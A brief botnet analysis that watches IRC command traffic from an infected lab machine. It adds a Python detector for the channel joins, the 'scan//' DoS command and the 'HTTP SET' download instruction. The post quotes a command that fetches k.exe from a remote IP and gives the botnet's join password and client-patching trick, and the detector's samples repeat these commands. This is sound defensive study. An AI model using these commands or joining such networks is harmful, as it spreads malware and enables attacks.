(Yet Another) Quick Botnet Analysis

Botnets are networks of malware-infected machines controlled by an adversary. Our approach to studying this botnet is active analysis: we take an actual malware sample, infect a machine with it and observe its activities.

As we probe deeper into the network traffic collected with Wireshark, we find very detailed IRC functionality, attack commands, and capabilities. We learn that “scan//” refers to a specific Denial of Service (DoS) attack function. Other notable strings include the IRC channel names “#dpi”, “#!” and “#Ma”, which may identify the IRC channels into which infected computers are summoned. Similarly, the string “HTTP SET http://xxx.xxx.183.171/k.exe” instructs the infected system to download the malicious executable from a remote web server (another malware distribution site).

As displayed above, we have to make some modifications to our IRC client to join the botnet with the password “laorosr”. The modification is rather simple: we loaded the IRC client in OllyDbg and changed the string “NICK” to “NCIK”, which allowed our IRC client to join the botnet without any error messages.
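The command strings found in the capture can be turned into straightforward detection logic for IRC traffic reassembled from a pcap. This is an added example, not code from the original post; the argument syntax after “scan//”, the sample lines and the indicator names are constructed assumptions.

```python
import re

# Channel names seen in the post's capture; a JOIN to any of them is a C&C indicator.
WATCHED_CHANNELS = {"#dpi", "#!", "#Ma"}

# The post names "scan//" (a DoS function) and "HTTP SET <url>" (a download
# instruction) but not their argument syntax; patterns key on the tokens only (assumption).
DOS_RE = re.compile(r"\bscan//")
DOWNLOAD_RE = re.compile(r"\bHTTP SET (https?://\S+)", re.IGNORECASE)

def parse_irc_line(line):
    # Returns (prefix, COMMAND, middle params, trailing text) or None if empty.
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, _, trailing = line.partition(" :")
    parts = head.split()
    return (prefix, parts[0].upper(), parts[1:], trailing) if parts else None

def classify(line):
    """Return (kind, detail) pairs for the botnet indicators in one IRC line."""
    msg = parse_irc_line(line)
    if msg is None:
        return []
    _, cmd, params, trailing = msg
    findings = []
    if cmd == "JOIN" and params:
        # JOIN's first parameter is a comma-separated channel list.
        for chan in params[0].split(","):
            if chan in WATCHED_CHANNELS:
                findings.append(("join_watched_channel", chan))
    elif cmd == "PRIVMSG":
        if DOS_RE.search(trailing):
            findings.append(("dos_command", trailing))
        m = DOWNLOAD_RE.search(trailing)
        if m:
            findings.append(("download_instruction", m.group(1)))
    return findings

def scan_capture(text):
    # Run classify() over every line of reassembled IRC traffic.
    return [f for line in text.splitlines() for f in classify(line)]

# Constructed sample (not from the original capture); the URL is the one quoted in the post.
SAMPLE_IRC = """\
JOIN #dpi laorosr
:op!op@host PRIVMSG #dpi :scan// 192.0.2.10 445 30
:op!op@host PRIVMSG #dpi :HTTP SET http://xxx.xxx.183.171/k.exe
:alice!a@host PRIVMSG #chat :hello everyone
"""
```

Running `scan_capture(SAMPLE_IRC)` yields one finding each for the watched-channel join, the DoS command and the download instruction, while the ordinary chat line produces none.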